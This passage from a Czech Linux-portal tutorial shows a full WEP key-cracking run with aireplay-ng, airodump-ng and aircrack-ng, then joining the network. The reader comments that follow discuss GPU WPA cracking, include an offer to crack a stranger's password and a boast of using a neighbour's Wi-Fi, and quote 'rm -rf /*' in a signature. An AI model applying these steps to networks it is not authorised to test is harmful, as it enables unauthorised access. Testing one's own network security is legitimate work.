No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
12:33:41  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:F9) on channel 1
Saving ARP requests in replay_arp-0603-123341.cap
You should also start airodump-ng to capture replies.
^Cad 51384 packets (got 19078 ARP requests and 13785 ACKs), sent 15930 packets...(500 pps)
V okně, kde nám běží airdump-ng, můžeme vidět velký nárůst přenášených packetů v položce data, něco jako násl. výstup.
CH 11 ][ Elapsed: 2 mins ][ 2012-06-03 12:35                                         
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9  -15  63     1212    15280  586  11  54   WEP  WEP    OPN  mikrotik 
                                                                                                                                                           
 
BSSID              STATION            PWR   Rate    Lost  Packets 	Probes 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9  00:11:22:33:44:55   -10    0 - 1   10420 29215  	 mikrotik
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15    0 -54e     0        6    	 mikrotik
7) V následujícím kroku spustíme program aircrack-ng, kterému předáme soubor se zachycenými daty. Výsledkem je zachycená passphrase, kterou následně použijeme k připojení se do sítě.
root@bt:~# aircrack-ng -b xx:xx:xx:xx:xx:F9 mikrotik.cap-01.cap 

Opening mikrotik.cap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 11837 ivs.



                                                                       Aircrack-ng 1.1 r1899


                                                       [00:00:00] Tested 554 keys (got 11785 IVs)

   KB    depth   byte(vote)
    0    1/  6   08(16384) DB(16384) 6A(15616) 72(15616) 7C(15616) 3A(15104) AD(15104) 49(14848) 70(14848) FE(14848) 09(14592) 1E(14592) 
    1    8/ 10   A1(15104) 5C(15104) 4F(14848) 77(14848) B5(14848) D5(14848) DE(14848) 9A(14592) C4(14592) 10(14336) 4C(14336) 50(14336) 
    2    1/  3   BD(15872) 1B(15616) 46(15616) 4B(15616) 8F(15616) E0(15616) 06(15360) 07(15360) 44(15360) 78(15104) 93(15104) 99(15104) 
    3    0/  4   3F(17408) 32(16640) 65(16640) 24(16384) 05(15872) A6(15872) F5(15872) DC(15616) 44(15104) 22(14848) 77(14848) 58(14592) 
    4    0/  1   C5(17664) B1(16384) 3D(15360) 78(15360) DB(15360) 07(15104) 85(15104) 6C(14848) 9A(14848) C1(14848) E3(14848) 0A(14592) 

                         KEY FOUND! [ 01:23:45:67:89 ] 
	Decrypted correctly: 100%

8) V posledním kroku se přihlásíme do sítě pomocí získané passphrase a programu dhclient jež už určitě nemusím představovat.
machine:user:~$ sudo iwconfig wlan0 essid mikrotik
machine:user:~$ sudo iwconfig wlan0

wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:0123-4567-89
          Power Management:off


machine:user:~$ sudo iwconfig wlan0 key 0123456789
machine:user:~$ sudo iwconfig wlan0

wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
          Mode:Managed  Frequency:2.437 GHz  Access Point: xx:xx:xx:xx:xx:F9   
          Bit Rate=1 Mb/s   Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:0123-4567-89
          Power Management:off
          Link Quality=62/70  Signal level=-48 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:4   Missed beacon:0


machine:user:~$ sudo dhclient -v wlan0 

Internet Systems Consortium DHCP Client 4.1.1-P1
Copyright 2004-2010 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/wlan0/00:11:22:33:44:55
Sending on   LPF/wlan0/00:11:22:33:44:55
Sending on   Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
DHCPOFFER from 192.168.0.1
DHCPREQUEST on wlan0 to 255.255.255.255 port 67
DHCPACK from 192.168.0.1
Reloading /etc/samba/smb.conf: smbd only.
bound to 192.168.0.33 -- renewal in 232699 seconds.

ZÁVĚR

Co napsat závěrem...? Přiznám se, že neznám principy použitých technik až do detailu, tudíž jsou některé části popsány poměrně stroze, řekl bych místy snad až nepřesně. Přesto však doufám, že podle výše popsaného návodu budete schopni ověřit si zabezpečení vlastní sítě. Snad jsem alespoň v hrubých obrysech vysvětlil jak principy hackování sítí fungují. Techniky, které jsem použil jsou jedny z mnoha možných. Pokud máte zájem testovat další techniky, odkážu Vás na manuálové stránky použitých programů. Pokud někdo použije uvedené techniky na prolomení hesla do cizí sítě, činí to samozřejmě na vlastní riziko:)
Byl bych rád za konstruktivní kritiku. Pokud najdete chyby, napište do diskuze. Chyby v článku opravím. Good luck!        

Hodnocení: 95 %

        špatnédobré        

Anketa

Jaký je váš názor na tento článek o hackingu wifi?
 (89 %)
 (11 %)
Celkem 105 hlasů

Obrázky

Hacking WiFi, obrázek 1 Hacking WiFi, obrázek 2

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (2) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

9.6.2012 18:59 Dejv | skóre: 37 | blog: Jak ten blog nazvat ... ? | Ostrava
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Hm, jeste by to chtelo si ujasnit pojmy hacking a cracking. Necetl jsem to cele, jen par uvodnich odstavcu, ale jestli jsem to spravne pochopil, jde o to, jak se dostat do (zde sice vlastni, ale to je jedno) site. Cili jde o prolomeni zabezpeceni cili crackovani. Viz http://cs.wikipedia.org/wiki/Hacking
Pevně věřím, že zkušenější uživatelé mě s mými nápady usměrní a pošlou tam, kam tyto nápady patří...
9.6.2012 19:18 gfsdg
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
chybi ti tam wps, s tim je taky docela prdel obcas
9.6.2012 19:51 hacup | skóre: 8
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Jak velký wordlist ti stačil k prolomeni. Zkoušel jsem 50MB velký a bylo to dost marný.
Bystroushaak avatar 9.6.2012 22:13 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Hacking WiFi
Heh. Přece tak velký, aby obsahoval i zadané heslo.
9.6.2012 22:58 Kvakor
Rozbalit Rozbalit vše Re: Hacking WiFi
Záleží na typu, ty nejmenší jsou jen seznam "oblíbených" hesel, větši obsahují celý slovník příslušného jazyka včetně běžných jmen, ty rozsáhlé přidávají další jména (z historie, z literatury, filmů ...), názvy ze zeměpisu, geologie, astronomie, fyziky, chemie, biologie ... Ty opravdu velké mají to samé ve více jazycích (včetně těch vymyšlených a různých verzí přepisů do latinky) a mišmaš ze všeho možného od názvů planet z Hvězdných válek po jména všech Pokémonů :-)
Člověk z Horní Dolní avatar 9.6.2012 19:51 Člověk z Horní Dolní | blog: blbeczhornidolni
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Doporučuji přečíst Trestní zákoník, Část druhá, Hlava V, § 230 - 232.

Samozřejmě si dělám si srandu, super článek :) Bohužel na mém HW to nefunguje...

Zajímavý je také ARP spoofing, umožňuje jednoduše odposlouchávat a provádět man-in-the-middle na WiFi síti, ke které jsem přihlášen. Funguje prakticky na všech WiFinách, jaké to používá šifrování (WEP, WPA, ...) je jedno.
9.6.2012 20:14 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Hacking WiFi
Doporučuji přečíst Trestní zákoník, Část druhá, Hlava V, § 230 - 232.
Hned jak jsem viděl tuto větu, podíval jsem se na jméno pisatele v hrozivém očekávání :-D
9.6.2012 21:38 w4rr10r
Rozbalit Rozbalit vše Re: Hacking WiFi
Blbec jako blbec.
9.6.2012 20:25 jestemmyfilantropami
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Zajímavé,mnozí zde volají po tom, ať si každý slušný člověk může zastřelit svého narušitele na soukromém pozemku,soudobý antikomunista je mravně otřesen potlačováním svobody jednotlivce,jeho práva na ochranu soukromí, listovní tajemství etc.za bývalé totality, a ejhle,hacker šmírovat a krást na cizím smí.Důkazy o jeho hackerské schopnosti si naopak zaslouží uznání.
9.6.2012 22:01 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: Hacking WiFi
Sice se říká "nekrmte trolly". Ale dovolím si upozornit, že stejně jako fakt že někdo ví jak si otevřít zamčené dveře z něj nedělá zloděje nebo z člověka co ví jak někoho jiného zabít (což je IMO každý svéprávný člověk) to nedělá vraha tak ani znalost slabin počítačových systému a sítí z nikoho nedělá crackera.
Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
Trollovi jde jenom o provokaci, coz neni tento pripad.
9.6.2012 23:19 jestemmyfilantropami
Rozbalit Rozbalit vše Re: Hacking WiFi
+1 :)
9.6.2012 23:17 jestemmyfilantropami
Rozbalit Rozbalit vše Re: Hacking WiFi
Sice se říká "nekrmte trolly"
Já jsem dobrej troll.
...znalost slabin...z nikoho nedělá
Ale je to velké pokušení,ukázat slabšímu, kde je jeho místo,že,Mrkvo? Taky to děláš,ty trolle:).

gtz avatar 9.6.2012 20:40 gtz | skóre: 27 | blog: gtz | Brno
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
No v jedné firmě kamarád řešil stále útoky na jejich WLAN, nakonec se vše vyřešilo použít WLAN routerů CISCO. Tedy WPA2 PSK, filtrování MAC adres včetně detekce duplicit MAC adres. Nastavovalo se to tam celkem agresivně (zahodily se obě adresy a daly se do blacklistu). No později se zjistilo, že tyto aktivity měly na svědomí žáci s nedaleké SPŠE.
- nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
vlastikroot avatar 9.6.2012 23:39 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Hacking WiFi
Security trough obscurity. Nechapu snahy v zabezpecovani wifi siti ... spravne by skrz wifi sit (a ani pres ethernet) nemelo byt bez dalsiho overovani dostupneho nic duleziteho. Pak muze byt kazdemu jedno, kdyz se tam nekdo dostane (z jakehokoli duvodu, kdyby ho dotycny nemel, tak to asi nedela). Nechci obhajovat zlodeje internetoveho pripojeni, ale v pripade zaku te skoly bych tipoval ze je na vine stav wifi skoly (jestli vubec nejakou maji). Kdyby meli vlastni poradnou, tak to nehackuji.
We will destroys the Christian's legion ... and the cross, will be inverted
David Watzke avatar 10.6.2012 00:23 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Hacking WiFi
Uvědomuješ si, že někdo může např. dělat chlípnosti pod IP adresou, která je vedená jako tvoje? Pokud je podle tebe v pořádku, aby se někdo mírnix týrnix připojoval k jakýkoliv wifině se mu zlíbí, tak seš teda pěknej exot.
“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
vlastikroot avatar 10.6.2012 01:43 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Hacking WiFi
Pochybuju ze nekdo bude na moji IP delat vetsi chlipnosti nez ja sam :-D Ale o to nejde ... spis jsem tim myslel ten MAC filter s blocklistovanim duplicit. Pokud bych si pres GPU akcelerovanej WPA cracker zjistil heslo z odposlouchanych handshaku, tak pokud by me to nepustilo s nahodnou MAC, zkousel bych MAC odchycenych paketu. V tomhle pripade by to teda zablokovalo nekolik pravoplatnych klientu (tohle samy delali spoluzaci pres windows login, proste se za ucitele prihlasili s 5x spatnym heslem a ucitel se tam hodinu nedostal). Misto bezproblemoveho (pro ostatni klienty) pouziti cizi wifi je nechteny DoS. Bezpecnost site podle me nespociva v nemoznosti se k siti pripojit (co by napr. udelal clovek s ethernet kabelem uvnitr firmy). Od bezpecnosti jsou firewally, autentifikace jednotlivych protokolu, oddeleni kritickych casti site (napr. patro plne windows masin, wifina, serverovna, vyrobni linka atd.).
We will destroys the Christian's legion ... and the cross, will be inverted
gtz avatar 10.6.2012 14:53 gtz | skóre: 27 | blog: gtz | Brno
Rozbalit Rozbalit vše Re: Hacking WiFi
Vnitřní síť po firmě je dlouho postavená na CISCO a je klid. Toto se dělo na síti co je venku pro účely IP kamer a možného přístupu návštěvníků na net. Tehdy se zjistilo odkud šly pokusy o hacking a nic se s tím nedělalo. Tehdy v tu dobu vyšel v chipu článek právě na toto téma a děcka to prostě asi zkoušely.
- nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
10.6.2012 09:32 David Jaša | skóre: 44 | blog: Dejvův blog
Rozbalit Rozbalit vše Re: Hacking WiFi
Dát tam WPA enterprise (klidně s jedním statickým jménem a heslem pro všechny), mají pokoj.
9.6.2012 21:58 Dirka | skóre: 15 | blog: dirka12345
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Takza na wpa2/psk neexistuje neslovnikovej utok nebo je mozna jina metoda? Generuju si samo fraze jako "dirkajekillaAvelKEJzabijakjakozeJOJO##zweimal!aidreimalpico%" tak jak moc se mam o to starat. Ma smysl cim delsi fraze tim lip, nebo po uricte delce uz je to jen onanie a stejne se to truncatne resp bude kolize s jinym kratsim?
9.6.2012 23:05 Kvakor
Rozbalit Rozbalit vše Re: Hacking WiFi
Pokud šifra nemá slabé místo, tak je jedinou možností (mimo brute-force) útok přes slovník. U délky hesla záleží, jakou další funkcí se prožene, ale obecně jedno písmeno je cca. 5 bitů. Pokud chce mít člověk opravdu jistotu, tak použije generované binární/hexadecimální heslo (nejlépe opravdu náhodným zdrojem), protože takové by mělo být odolné i proti slovníkovýnm útokům (tedy pokud útočník náhodou netrefí něco, z čeho vyleze stejný hash).
the.max avatar 9.6.2012 23:46 the.max | skóre: 46 | blog: Smetiště
Rozbalit Rozbalit vše Re: Hacking WiFi
kdysi jsem jako pro WPA2-PSK pouzival product key z win:-D
KERNEL ULTRAS Fan Team || Sabaton - nejlepší učitel dějepisu || Gentoo - dokud nás systemd nerozdělí.
vlastikroot avatar 10.6.2012 01:47 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Hacking WiFi
Staci dost silnej cluster osazenej dostatecnym poctem vykonych GPU. Pak je na vyber rada programu napr. pyrit. Dpkad nebyla GPU akcelerace, tak bylo WPA docela bezpecny, ale dneska se podle me na bezpecnost wifi neda spolehnout nikdy.
We will destroys the Christian's legion ... and the cross, will be inverted
10.6.2012 09:40 David Jaša | skóre: 44 | blog: Dejvův blog
Rozbalit Rozbalit vše Re: Hacking WiFi
s/WPA/WPA-PSK/
Bedňa avatar 10.6.2012 05:17 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
Na prelomenie WEP sú už dnes pekné klikátka a WPA sa pri dobrom hesle nedá zlomiť, teda určite nie pokiaľ nevlastníme doma superpočítač za milóny dolárov.
KERNEL ULTRAS video channel >>>
10.6.2012 15:51 r00t
Rozbalit Rozbalit vše Re: Hacking WiFi
WPA a WPA2 crackujem na Radeon HD 7750 1024DDR5 PCI 3.0 cez noc...
polo23 avatar 10.6.2012 16:15 polo23 | skóre: 28 | blog: polo23
Rozbalit Rozbalit vše Re: Hacking WiFi
Mohl bys uvest nejaky zdroj jak na to. Celkem by me zajimalo jak ke crackovani vyuzit GPU. Pouzivas slovnikovy utok a nebo bruteforce?
Jendа avatar 10.6.2012 16:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Hacking WiFi
I když si jako heslo nastavím jméno svého pejska (ZeHM3TxrroI)?
10.6.2012 17:16 r00t
Rozbalit Rozbalit vše Re: Hacking WiFi
Pouzivam viacere tooly (najviac Pyrit resp. Pyrit w/ CoWPAtty ) staci mat dost rainbow tabuliek (cca 1TB) a slovnikov (400GB asi 12 jazykov + specialne + uz najdene (vlastne/cudzie)). Heslo do 8 alfanumerickych znakov zvladam do 48 hodin.
10.6.2012 18:01 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: Hacking WiFi
Co heslo typu "I don't want to be the fool once more, how could I ever think that I can win?" nebo obecně pár slov z textu nějaké oblíbené písničky? Na to rainbow tabulky a slovníky taky moc nejsou.
Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
10.6.2012 18:55 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Hacking WiFi
A co heslo obsahující skoro 20 [:print:] znaků + neobvyklé SSID?
polo23 avatar 10.6.2012 19:34 polo23 | skóre: 28 | blog: polo23
Rozbalit Rozbalit vše Re: Hacking WiFi
Vsak on tam pise, ze prolomi heslo o 8 znacich.Takze pokud ma vice znaku tak by ho prolomil jen kdyby melo stejny hash jako nejake z tech 8 znakovych hesel.
Bedňa avatar 10.6.2012 22:45 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Hacking WiFi
Alebo:

Dobro je prisjetiti se da prividno prav prut prema cilju predstavja u stvari pravodlivo krivudanje.
KERNEL ULTRAS video channel >>>
11.6.2012 12:45 Honza
Rozbalit Rozbalit vše Re: Hacking WiFi
Ahoj, dalo by se s tebou domluvit nejak na prolomeni hesla?
11.6.2012 13:46 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Hacking WiFi
Hrome, rychle, kde je to červený tlačítko od IWF :-D
11.6.2012 14:07 r00t
Rozbalit Rozbalit vše Re: Hacking WiFi
Aky typ hesla?
kotyz avatar 11.6.2012 16:11 kotyz | skóre: 25 | blog: kotyzblog | Plzeň
Rozbalit Rozbalit vše Re: Hacking WiFi
heslo1234 :-D
Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
Bedňa avatar 13.6.2012 12:52 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Hacking WiFi
Moc dlhé, hardcore security používajú nbu123
KERNEL ULTRAS video channel >>>
13.6.2012 20:19 r00t
Rozbalit Rozbalit vše Re: Hacking WiFi
sa smejes, ale bolo to nbusr123... a nieje to vobec az tak lahke heslo - ti ludia ho necrackli ale nasli v mailovej (nekryptovanej!) korespondencii...
polo23 avatar 11.6.2012 19:58 polo23 | skóre: 28 | blog: polo23
Rozbalit Rozbalit vše Re: Hacking WiFi
Ahoj, myslim, ze by bylo prinosnejsi kdybys treba napsal jake distro pouzivas, jaky ovladac pro gpu atd. Me by treba zajimaly ty tvoje rainbow tables. To jsi vybral mnozinu znaku, vytvoril kombinace o delce 8 znaku a zhasoval je? A tim ti vznikla 1TB rainbow tabulka? Ta tabulka je ale platna jen pro konkretni essid ne? Pokud se essid zmeni tak ta tabulka je pak k nicemu ne?
vlastikroot avatar 13.6.2012 19:48 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
Rozbalit Rozbalit vše Re: Hacking WiFi
Co kdyz si puvodni provozovatel zvoli jine heslo? Pak je rainbow table lepsi nez znovu bruteforce.
We will destroys the Christian's legion ... and the cross, will be inverted
12.6.2012 15:18 Honza
Rozbalit Rozbalit vše Re: Hacking WiFi
WPA2/PSK
Petr Tomášek avatar 13.6.2012 23:06 Petr Tomášek | skóre: 39 | blog: Vejšplechty
Rozbalit Rozbalit vše Re: Hacking WiFi

Cool. Jenomze kolega ma heslo o 11 znacich, tj. o 3 znaky delsi, nez to tvoje 8mi-znakove. Jestlize jeden znak dava baj woko 5 bitu, pak to znamena, ze takoveto heslo budes zvladat priblizne za 2^(3*5)*2 dni = zhruba 179 let.

Prijemnou zabavu! :-)

multicult.fm | monokultura je zlo | welcome refugees!
stativ avatar 10.6.2012 10:43 stativ | skóre: 54 | blog: SlaNé roury
Rozbalit Rozbalit vše Re: Hacking WiFi
Odpovědět | Sbalit | Link | Blokovat | Admin
V anketě ti schází možnost „Konečně srozumitelný návod na hacking wifi, zkoušet ho ale nebudu.“
Ať sežeru elfa i s chlupama!!! ljirkovsky.wordpress.com stativ.tk
22.4.2013 14:09 jarda
Rozbalit Rozbalit vše Re: Hacking WiFi
To je moc slozity...nejsem uplnej hlupak,ale tohle mi prijde jednodussi...nevim.. http://www.wepcrack.org/download.html
14.6.2013 23:26 babyHCK
Rozbalit Rozbalit vše Re: Hacking WiFi
Ou, super! Takovej fofr jsem teda necekal,holt jde videt,ze zadna ochrana neni nikdy 100%.Autorovi programku PALEC NAHORU.Jedu na souseda uz druhej mesic,tj cca 500,-/mesic.Objednam si za to novy notebook na splatky.Jeste jedno diiiikkkk !!!! ;-)

Založit nové vláknoNahoru

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.